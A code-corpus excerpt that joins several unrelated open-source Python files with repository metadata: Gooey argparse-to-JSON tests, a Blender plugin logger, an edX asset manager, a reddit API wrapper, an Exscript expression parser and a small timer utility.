result = argparse_to_json.action_to_json(choice_action, 'Listbox', {})
self.assertEqual(getin(result, ['data', 'default']), ['1', '2'])
def test_listbox_single_default_cast_correctly(self):
"""
Single arg defaults to listbox should be wrapped in a list and
their contents coerced as usual.
"""
parser = GooeyParser()
parser.add_argument('--foo', widget="Listbox",
nargs="*", choices=[1, 2, 3], default="sup")
choice_action = parser._actions[-1]
result = argparse_to_json.action_to_json(choice_action, 'Listbox', {})
self.assertEqual(getin(result, ['data', 'default']), ['sup'])
def test_non_data_defaults_are_dropped_entirely(self):
"""
This is a refinement in understanding of Issue #147
Caused by Issue 377 - passing arbitrary objects as defaults
causes failures.
"""
# passing plain data to cleaning function results in plain data
# being returned
data = ['abc',
123,
['a', 'b'],
[1, 2, 3]]
for datum in data:
result = argparse_to_json.clean_default(datum)
self.assertEqual(result, datum)
# passing in complex objects results in None
objects = [sys.stdout, sys.stdin, object(), max, min]
for obj in objects:
result = argparse_to_json.clean_default(obj)
self.assertEqual(result, None)
def test_suppress_is_removed_as_default_value(self):
"""
Issue #469
Argparse uses the literal string ==SUPPRESS== as an internal flag.
When encountered in Gooey, these should be dropped and mapped to `None`.
"""
parser = ArgumentParser(prog='test_program')
parser.add_argument("--foo", default=argparse.SUPPRESS)
parser.add_argument('--version', action='version', version='1.0')
result = argparse_to_json.convert(parser, required_cols=2, optional_cols=2)
groups = getin(result, ['widgets', 'test_program', 'contents'])
for item in groups[0]['items']:
self.assertEqual(getin(item, ['data', 'default']), None)
def test_version_maps_to_checkbox(self):
testcases = [
[['--version'], {}, 'TextField'],
# we only remap if the action is version
# i.e. we don't care about the argument name itself
[['--version'], {'action': 'store'}, 'TextField'],
# should get mapped to CheckBox because of the action
[['--version'], {'action': 'version'}, 'CheckBox'],
# ditto, even through the 'name' isn't 'version'
[['--foobar'], {'action': 'version'}, 'CheckBox'],
]
for args, kwargs, expectedType in testcases:
with self.subTest([args, kwargs]):
parser = argparse.ArgumentParser(prog='test')
parser.add_argument(*args, **kwargs)
result = argparse_to_json.convert(parser, required_cols=2, optional_cols=2)
contents = getin(result, ['widgets', 'test', 'contents'])[0]
self.assertEqual(contents['items'][0]['type'], expectedType)
def test_textinput_with_list_default_mapped_to_cli_friendly_value(self):
"""
Issue: #500
Using nargs and a `default` value with a list causes the literal list string
to be put into the UI.
"""
testcases = [
{'nargs': '+', 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
{'nargs': '*', 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
{'nargs': '...', 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
{'nargs': 2, 'default': ['a b', 'c'], 'gooey_default': '"a b" "c"', 'w': 'TextField'},
# TODO: this demos the current nargs behavior for string defaults, but
# TODO: it is wrong! These should be wrapped in quotes so spaces aren't
# TODO: interpreted as unique arguments.
{'nargs': '+', 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
{'nargs': '*', 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
{'nargs': '...', 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
{'nargs': 1, 'default': 'a b', 'gooey_default': 'a b', 'w': 'TextField'},
# Listbox has special nargs handling which keeps the list in tact.
{'nargs': '+', 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'], 'w': 'Listbox'},
{'nargs': '*', 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'], 'w': 'Listbox'},
{'nargs': '...', 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'],'w': 'Listbox'},
{'nargs': 2, 'default': ['a b', 'c'], 'gooey_default': ['a b', 'c'], 'w': 'Listbox'},
{'nargs': '+', 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
{'nargs': '*', 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
{'nargs': '...', 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
{'nargs': 1, 'default': 'a b', 'gooey_default': ['a b'], 'w': 'Listbox'},
]
for case in testcases:
with self.subTest(case):
parser = ArgumentParser(prog='test_program')
parser.add_argument('--foo', nargs=case['nargs'], default=case['default'])
action = parser._actions[-1]
result = argparse_to_json.handle_initial_values(action, case['w'], action.default)
self.assertEqual(result, case['gooey_default'])
def test_nargs(self):
"""
so there are just a few simple rules here:
if nargs in [*, N, +, remainder]:
default MUST be a list OR we must map it to one
action:_StoreAction
- nargs '?'
- default:validate list is invalid
- default:coerce stringify
- nargs #{*, N, +, REMAINDER}
- default:validate None
- default:coerce
if string: stringify
if list: convert from list to cli style input string
action:_StoreConstAction
- nargs: invalid
- defaults:stringify
action:{_StoreFalseAction, _StoreTrueAction}
- nargs: invalid
- defaults:validate: require bool
- defaults:coerce: no stringify; leave bool
action:_CountAction
- nargs: invalid
- default:validate: must be numeric index within range OR None
- default:coerce: integer or None
action:_AppendAction
TODO: NOT CURRENTLY SUPPORTED BY GOOEY
nargs behavior is weird and needs to be understood.
- nargs
action:CustomUserAction:
- nargs: no way to know expected behavior. Ignore
- default: jsonify type if possible.
"""
parser = ArgumentParser()
parser.add_argument(
'--bar',
nargs='+',
choices=["one", "two"],
default="one",
)
def test_filetype_chooses_good_widget(self):
"""
#743 chose the picker type based on the FileType mode
when available.
"""
cases = [
(FileType(), 'FileChooser'),
(FileType('r'), 'FileChooser'),
(FileType('rb'), 'FileChooser'),
(FileType('rt'), 'FileChooser'),
(FileType('w'), 'FileSaver'),
(FileType('wt'), 'FileSaver'),
(FileType('wb'), 'FileSaver'),
(FileType('a'), 'FileSaver'),
(FileType('x'), 'FileSaver'),
(FileType('+'), 'FileSaver'),
]
for filetype, expected_widget in cases:
            with self.subTest(f'expect {filetype} to produce {expected_widget}'):
parser = ArgumentParser()
parser.add_argument('foo', type=filetype)
action = [parser._actions[-1]]
result = next(argparse_to_json.categorize(action, {}, {}))
self.assertEqual(result['type'], expected_widget)
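    # --- Editor's addition: hedged sketch, not part of the original suite. ---
    # Mirrors the convert() round trip used by the tests above: build a parser,
    # convert it, and walk the widget spec with getin. The assertion is kept
    # deliberately loose since the exact group layout is not pinned down here.
    def test_editor_example_basic_round_trip(self):
        parser = ArgumentParser(prog='example')
        parser.add_argument('--name', default='world')
        result = argparse_to_json.convert(parser, required_cols=2, optional_cols=2)
        contents = getin(result, ['widgets', 'example', 'contents'])
        self.assertTrue(len(contents) > 0)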
|
chriskiehl/Gooey
|
gooey/tests/test_argparse_to_json.py
|
Python
|
mit
| 12,621
|
import tmt
DESCRIPTION = "A dead simple svg generation library written in pure Java, with no dependencies. This code runs on both desktop Java, Android, and compiles to Javascript with GWT."
tmt.EclipseProject(tmt.projectName(), description=DESCRIPTION)
|
pedrosino/tnoodle
|
svglite/tmtproject.py
|
Python
|
gpl-3.0
| 256
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import os
import re
import platform
LOG_FILE_PATH = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'log.txt'))
LOG_CONVERT = re.compile("\033\[[0-9;]+m")
NUMBER_OF_WARNINGS = 0
def clear_log():
global NUMBER_OF_WARNINGS
NUMBER_OF_WARNINGS = 0
with open(LOG_FILE_PATH, mode='w', encoding='utf-8', ):
# clear log file..
pass
clear_log()
def copy_paste_log(log_file_path):
import shutil
shutil.copyfile(LOG_FILE_PATH, log_file_path)
class LogStyles:
NORMAL = "\033[40m\033[32m"
HEADER = "\033[46m\033[30m"
MESSAGE = "\033[42m\033[30m"
WARNING = "\033[43m\033[1;30mWARNING: "
ERROR = "\033[41m\033[1;30mERROR: "
END = "\033[0m"
EOL = "\n"
if(platform.system() == 'Windows'):
# no pretty logging for windows
LogStyles.NORMAL = ""
LogStyles.HEADER = ""
LogStyles.MESSAGE = ""
LogStyles.WARNING = "WARNING: "
LogStyles.ERROR = "ERROR: "
LogStyles.END = ""
def log(msg="", indent=0, style=LogStyles.NORMAL, instance=None, prefix="> ", ):
global NUMBER_OF_WARNINGS
if(style == LogStyles.WARNING):
NUMBER_OF_WARNINGS += 1
if(instance is None):
inst = ""
else:
cn = instance.__class__.__name__
cl = cn.split(".")
inst = "{0}: ".format(cl[-1])
m = "{0}{1}{2}{3}{4}{5}".format(" " * indent, style, prefix, inst, msg, LogStyles.END)
print(m)
with open(LOG_FILE_PATH, mode='a', encoding='utf-8', ) as f:
f.write("{}{}".format(re.sub(LOG_CONVERT, '', m), LogStyles.EOL))
def log_args(locals, self, header="arguments: ", indent=1, style=LogStyles.NORMAL, prefix="> ", ):
import inspect
l = dict([(k, v) for k, v in locals.items() if v != self and k != '__class__'])
f = [i for i in inspect.getfullargspec(self.__init__).args if i != 'self']
t = " "
s = " "
hl = 0
for i in f:
if(len(i) > hl):
hl = len(i)
# hl += 1
vs = ["{0}: {1}".format(i.ljust(hl, s), l[i]) for i in f]
for i, v in enumerate(vs):
if(i == 0):
vs[i] = "{0}{1}\n".format(header, v)
elif(i == len(vs) - 1):
vs[i] = "{0}{1}{2}{3}".format(t * indent, s * len(prefix), s * len(header), v)
else:
vs[i] = "{0}{1}{2}{3}\n".format(t * indent, s * len(prefix), s * len(header), v)
log("".join(vs), indent, style, None, prefix, )
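# --- Editor's addition: hedged usage sketch, not part of the original file. ---
# Demonstrates the log() helper defined above. Messages are printed with the
# ANSI styles and appended, with the escape codes stripped, to log.txt next to
# this module.
if __name__ == '__main__':
    log("starting export", style=LogStyles.HEADER)
    log("missing texture, using fallback", indent=1, style=LogStyles.WARNING)
    log("done", style=LogStyles.MESSAGE)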
|
uhlik/render_maxwell
|
log.py
|
Python
|
gpl-2.0
| 3,222
|
"""
Asset Manager
Interface allowing course asset saving/retrieving.
Handles:
- saving asset in the BlobStore -and- saving asset metadata in course modulestore.
- retrieving asset metadata from course modulestore -and- returning URL to asset -or- asset bytes.
Phase 1: Checks to see if an asset's metadata can be found in the course's modulestore.
If not found, fails over to access the asset from the contentstore.
At first, the asset metadata will never be found, since saving isn't implemented yet.
Note: Hotfix (PLAT-734) No asset calls find_asset_metadata, and directly accesses from contentstore.
"""
from contracts import contract, new_contract
from opaque_keys.edx.keys import AssetKey
from xmodule.contentstore.django import contentstore
new_contract('AssetKey', AssetKey)
class AssetException(Exception):
"""
Base exception class for all exceptions related to assets.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class AssetMetadataNotFound(AssetException):
"""
Thrown when no asset metadata is present in the course modulestore for the particular asset requested.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class AssetMetadataFoundTemporary(AssetException):
"""
TEMPORARY: Thrown if asset metadata is actually found in the course modulestore.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
class AssetManager(object):
"""
Manager for saving/loading course assets.
"""
@staticmethod
@contract(asset_key='AssetKey', throw_on_not_found='bool', as_stream='bool')
def find(asset_key, throw_on_not_found=True, as_stream=False):
"""
Finds course asset in the deprecated contentstore.
This method was previously searching for the course asset in the assetstore first, then in the deprecated
contentstore. However, the asset was never found in the assetstore since an asset's metadata is
        not yet stored there (removed calls to modulestore().find_asset_metadata(asset_key)).
The assetstore search was removed due to performance issues caused by each call unpickling the pickled and
compressed course structure from the structure cache.
"""
return contentstore().find(asset_key, throw_on_not_found, as_stream)
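# --- Editor's addition: hedged usage sketch, not part of the original file. ---
# Shows the typical call into AssetManager.find. The asset-v1 key string is
# illustrative only, and a configured contentstore (Django settings) is assumed
# to be available at runtime.
if __name__ == '__main__':
    example_key = AssetKey.from_string(
        'asset-v1:edX+DemoX+Demo_Course+type@asset+block@course_image.jpg')
    content = AssetManager.find(example_key, throw_on_not_found=False)
    print('asset found: {}'.format(content is not None))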
|
stvstnfrd/edx-platform
|
common/lib/xmodule/xmodule/assetstore/assetmgr.py
|
Python
|
agpl-3.0
| 2,322
|
__author__ = 'idclark'
import requests as r
def about_subreddit(sr):
"""get an overview for a given subreddit
> running = about_subreddit('running')
"""
url = r'http://www.reddit.com/r/{sr}/about.json'.format(sr=sr)
response = r.get(url)
return response.json()['data']
def my_subreddits(client, status, limit):
"""
return a list of subreddits an account is subscribed to.
client requires running accounts.user_login() first to start a user session
status: 'subscriber', 'moderator', 'contributor'
limit: max of 100
> my_subs = my_subreddits(client, 'contributor', limit=25)
"""
url = r'http://www.reddit.com/subreddits/mine/{st}.json'.format(st=status)
data = {'limit': limit}
    response = client.get(url, params=data)
return response.json()['data']
#TODO this returns 404 ??
def recommend_subreddits(srnames, omit):
"""
    Inputs: srnames = iterable of subreddit names (joined into a comma-separated string)
    omit: iterable of subreddit names to omit from the recommendation
"""
data = {'srnames': ",".join(srnames), 'omit': ",".join(omit)}
url = r'http://www.reddit.com/api/subreddit_recommendations'
    response = r.get(url, params=data)
return response.content
#TODO this returns an empty list...
def search_by_topic(query):
"""
search subreddits by inputting a given topic
"""
data = {'query': str(query)}
url = r'http://www.reddit.com/api/subreddits_by_topic.json'
    response = r.get(url, params=data)
return response.json()['data']
def subreddits_by_rank(criteria, limit=3):
"""
returns list of subreddits according to given criteria
criteria: popular, new, banned
> most_popular_subs = subreddits_by_rank('popular', limit=10)
"""
data = {'limit': limit}
url = r'http://www.reddit.com/subreddits/{c}.json'.format(c=criteria)
    response = r.get(url, params=data)
return response.json()['data']['children']
def list_subreddit_submissions(subreddit, criteria):
"""
for a given subreddit, return a list of articles, sorted by the given criteria:
hot, new, random
> python_subs = list_subreddit_submissions('python', 'hot')
"""
criteria_choices = ['hot', 'new', 'random']
if criteria not in criteria_choices:
raise Exception('Please enter a valid criteria choice')
url = r'http://www.reddit.com/r/{s}/{c}.json'.format(s=subreddit, c=criteria)
response = r.get(url)
data = response.json()
children = data['data']['children']
return children
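# --- Editor's addition: hedged usage sketch, not part of the original file. ---
# Ties the helpers above together. Note that reddit expects a descriptive
# User-Agent header and rate-limits anonymous clients; these bare calls do not
# handle either concern.
if __name__ == '__main__':
    info = about_subreddit('python')
    print(info.get('title'))
    for post in list_subreddit_submissions('python', 'hot')[:5]:
        print(post['data']['title'])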
|
idclark/wrap-it-up
|
reddit_py/subreddits.py
|
Python
|
mit
| 2,511
|
# Copyright (C) 2007-2010 Samuel Abels.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import Term
from Exscript.parselib import Token
class ExpressionNode(Token):
def __init__(self, lexer, parser, parent, parent_node = None):
# Skip whitespace before initializing the token to make sure that self.start
# points to the beginning of the expression (which makes for prettier error
# messages).
lexer.skip(['whitespace', 'newline'])
Token.__init__(self, 'ExpressionNode', lexer, parser, parent)
self.lft = None
self.rgt = None
self.op = None
self.op_type = None
self.parent_node = parent_node
# The "not" operator requires special treatment because it is
# positioned left of the term.
if not lexer.current_is('logical_operator', 'not'):
self.lft = Term.Term(lexer, parser, parent)
# The expression may end already (a single term is also an
# expression).
lexer.skip(['whitespace', 'newline'])
if not lexer.current_is('arithmetic_operator') and \
not lexer.current_is('logical_operator') and \
not lexer.current_is('comparison') and \
not lexer.current_is('regex_delimiter'):
self.mark_end()
return
# Expect the operator.
self.op_type, self.op = lexer.token()
if not lexer.next_if('arithmetic_operator') and \
not lexer.next_if('logical_operator') and \
not lexer.next_if('comparison') and \
not lexer.next_if('regex_delimiter'):
self.mark_end()
msg = 'Expected operator but got %s' % self.op_type
lexer.syntax_error(msg, self)
# Expect the second term.
self.rgt = ExpressionNode(lexer, parser, parent, self)
self.mark_end()
def priority(self):
if self.op is None:
return 8
elif self.op_type == 'arithmetic_operator' and self.op == '%':
return 7
elif self.op_type == 'arithmetic_operator' and self.op == '*':
return 6
elif self.op_type == 'regex_delimiter':
return 6
elif self.op_type == 'arithmetic_operator' and self.op != '.':
return 5
elif self.op == '.':
return 4
elif self.op_type == 'comparison':
return 3
elif self.op == 'not':
return 2
elif self.op_type == 'logical_operator':
return 1
else:
raise Exception('Invalid operator.')
def value(self, context):
# Special behavior where we only have one term.
if self.op is None:
return self.lft.value(context)
elif self.op == 'not':
return [not self.rgt.value(context)[0]]
# There are only two types of values: Regular expressions and lists.
# We also have to make sure that empty lists do not cause an error.
lft_lst = self.lft.value(context)
if type(lft_lst) == type([]):
if len(lft_lst) > 0:
lft = lft_lst[0]
else:
lft = ''
rgt_lst = self.rgt.value(context)
if type(rgt_lst) == type([]):
if len(rgt_lst) > 0:
rgt = rgt_lst[0]
else:
rgt = ''
if self.op_type == 'arithmetic_operator' and self.op != '.':
error = 'Operand for %s is not a number' % (self.op)
try:
lft = int(lft)
except ValueError:
self.lexer.runtime_error(error, self.lft)
try:
rgt = int(rgt)
except ValueError:
self.lexer.runtime_error(error, self.rgt)
# Two-term expressions.
if self.op == 'is':
return [lft == rgt]
elif self.op == 'matches':
regex = rgt_lst
# The "matches" keyword requires a regular expression as the right hand
# operand. The exception throws if "regex" does not have a match() method.
try:
regex.match(str(lft))
except AttributeError:
error = 'Right hand operator is not a regular expression'
self.lexer.runtime_error(error, self.rgt)
for line in lft_lst:
if regex.search(str(line)):
return [1]
return [0]
elif self.op == 'is not':
#print "LFT: '%s', RGT: '%s', RES: %s" % (lft, rgt, [lft != rgt])
return [lft != rgt]
elif self.op == 'in':
return [lft in rgt_lst]
elif self.op == 'not in':
return [lft not in rgt_lst]
elif self.op == 'ge':
return [int(lft) >= int(rgt)]
elif self.op == 'gt':
return [int(lft) > int(rgt)]
elif self.op == 'le':
return [int(lft) <= int(rgt)]
elif self.op == 'lt':
return [int(lft) < int(rgt)]
elif self.op == 'and':
return [lft and rgt]
elif self.op == 'or':
return [lft or rgt]
elif self.op == '*':
return [int(lft) * int(rgt)]
elif self.op == '/':
return [int(lft) / int(rgt)]
elif self.op == '%':
return [int(lft) % int(rgt)]
elif self.op == '.':
return [str(lft) + str(rgt)]
elif self.op == '+':
return [int(lft) + int(rgt)]
elif self.op == '-':
return [int(lft) - int(rgt)]
def dump(self, indent = 0):
print (' ' * indent) + self.name, self.op, 'start'
if self.lft is not None:
self.lft.dump(indent + 1)
print (' ' * (indent + 1)) + 'Operator', self.op
if self.rgt is not None:
self.rgt.dump(indent + 1)
print (' ' * indent) + self.name, self.op, 'end.'
|
gnperumal/exscript
|
src/Exscript/interpreter/ExpressionNode.py
|
Python
|
gpl-2.0
| 6,560
|
import time
class Timer:
def __init__(self, verbose=False):
self.verbose = verbose
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
if self.verbose:
print 'elapsed time: %f ms' % self.msecs
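# --- Editor's addition: hedged usage sketch, not part of the original file. ---
# The context manager times the wrapped block; .secs and .msecs hold the
# elapsed time once the block exits, and verbose=True prints it as well.
if __name__ == '__main__':
    with Timer(verbose=True) as t:
        sum(range(1000000))
    # t.msecs now holds the elapsed time in milliseconds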
|
caynan/adsd
|
measuringProject/app/timer.py
|
Python
|
mit
| 409
|